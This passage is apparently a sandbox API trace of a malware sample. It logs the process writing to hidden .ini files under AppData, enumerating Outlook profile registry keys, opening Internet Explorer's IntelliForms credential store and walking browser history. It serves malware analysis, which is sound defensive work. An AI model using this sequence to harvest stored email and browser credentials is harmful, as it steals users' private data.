FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.985] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3028) returned 1 [0279.985] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.985] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1a, ByteOffset=0xdd5fc*=1590, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.986] NtClose (Handle=0x38c) returned 0x0 [0279.987] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.987] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.987] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b32d0) returned 1 [0279.987] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.987] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=1616, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.987] NtClose (Handle=0x38c) returned 0x0 [0279.988] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.988] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.988] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.988] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.988] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.988] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1c, ByteOffset=0xdd5fc*=1640, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.988] NtClose (Handle=0x38c) returned 0x0 [0280.003] RtlIntegerToChar (in: Value=0x4, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="4") returned 0x0 [0280.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.003] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0280.004] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0280.004] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0280.004] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x6, ByteOffset=0xdd5fc*=1668, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0280.004] NtClose (Handle=0x38c) returned 0x0 [0280.005] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0280.005] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.005] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0280.006] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0280.006] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0280.006] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1a, ByteOffset=0xdd5fc*=1674, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0280.006] NtClose (Handle=0x38c) returned 0x0 [0280.010] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.010] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0280.011] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0280.011] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0280.011] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x22, ByteOffset=0xdd5fc*=1700, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0280.011] NtClose (Handle=0x38c) returned 0x0 [0280.012] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0280.012] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.012] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0280.013] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0280.013] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0280.013] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x20, ByteOffset=0xdd5fc*=1734, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0280.013] NtClose (Handle=0x38c) returned 0x0 [0280.014] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.014] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x38c, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0280.014] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0280.014] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0280.014] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x14, ByteOffset=0xdd5fc*=1766, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0280.014] NtClose (Handle=0x38c) returned 0x0 [0280.016] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x8000001a [0280.016] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd71c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.016] NtCreateFile (in: FileHandle=0xdd73c, DesiredAccess=0x12019f, ObjectAttributes=0xdd704*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd724, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd73c*=0x38c, IoStatusBlock=0xdd724*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0280.016] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0280.016] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdd724, FileInformation=0xdd67c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd724, FileInformation=0xdd67c) returned 0x0 [0280.017] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd724, Buffer=0x58c868*, Length=0x4, ByteOffset=0xdd694*=1786, Key=0x0 | out: IoStatusBlock=0xdd724, Buffer=0x58c868*) returned 0x0 [0280.017] NtClose (Handle=0x38c) returned 0x0 [0280.018] NtClose (Handle=0x254) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x250, Index=0x3, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0280.018] NtClose (Handle=0x250) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x390, Index=0xa, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0280.018] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0280.018] NtClose (Handle=0x250) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x390, Index=0xb, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0280.018] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0280.018] NtClose (Handle=0x250) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x390, Index=0xc, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0280.018] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0280.018] NtClose (Handle=0x250) returned 0x0 [0280.018] NtEnumerateKey (in: KeyHandle=0x390, Index=0xd, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0280.019] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x250) returned 0x0 [0280.019] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x8000001a [0280.019] NtClose (Handle=0x250) returned 0x0 [0280.019] NtEnumerateKey (in: KeyHandle=0x390, Index=0xe, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x8000001a [0280.019] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3bc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0x250) returned 0x0 [0280.020] NtEnumerateKey (in: KeyHandle=0x250, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x8000001a [0280.021] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddb14 | out: TokenHandle=0xddb14*=0x254) returned 0x0 [0280.021] NtQueryInformationToken (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0xdd30c, TokenInformationLength=0x400, ReturnLength=0xddb0c | out: TokenInformation=0xdd30c, ReturnLength=0xddb0c) returned 0x0 [0280.021] ConvertSidToStringSidW (in: Sid=0xdd314*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddb10 | out: StringSid=0xddb10*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0280.021] NtClose (Handle=0x254) returned 0x0 [0280.022] NtCreateKey (in: KeyHandle=0xdea28, DesiredAccess=0x20219, ObjectAttributes=0xddb10*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea28*=0x254) returned 0x0 [0280.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0xdda0c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.022] NtCreateFile (in: FileHandle=0xdda2c, DesiredAccess=0x120089, ObjectAttributes=0xdd9f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdda14, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdda2c*=0x0, IoStatusBlock=0xdda14*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0280.022] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0280.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0xdda24, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.022] NtCreateFile (in: FileHandle=0xdda44, DesiredAccess=0x12019f, ObjectAttributes=0xdda0c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdda2c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdda44*=0x38c, IoStatusBlock=0xdda2c*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0280.023] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2fa0) returned 1 [0280.023] NtQueryInformationFile (in: FileHandle=0x38c, IoStatusBlock=0xdda2c, FileInformation=0xdd984, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdda2c, FileInformation=0xdd984) returned 0x0 [0280.023] NtWriteFile (in: FileHandle=0x38c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdda2c, Buffer=0x58c868*, Length=0x28, ByteOffset=0xdd99c*=0, Key=0x0 | out: IoStatusBlock=0xdda2c, Buffer=0x58c868*) returned 0x0 [0280.025] NtClose (Handle=0x38c) returned 0x0 [0280.110] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0xdda38 | out: BaseAddress=0xdda38*=0x767c0000) returned 0x0 [0280.130] LdrGetProcedureAddress (in: BaseAddress=0x767c0000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xdda1c | out: ProcedureAddress=0xdda1c*=0x76a092a0) returned 0x0 [0280.132] LdrGetProcedureAddress (in: BaseAddress=0x767c0000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xdda08 | out: ProcedureAddress=0xdda08*=0x76a30060) returned 0x0 [0280.133] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1f4400) returned 0x7dbd020 [0280.176] CoInitialize (pvReserved=0x0) returned 0x0 [0280.202] CoCreateInstance (in: rclsid=0xddb20*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xddb30*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0xddb48 | out: ppv=0xddb48*=0x5c54b8) returned 0x0 [0280.259] IUrlHistoryStg:EnumUrls (in: This=0x5c54b8, ppenum=0xddb44 | out: ppenum=0xddb44*=0x59aff0) returned 0x0 [0280.263] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0xdf2e0 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.327] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.328] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.329] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.329] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.329] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, 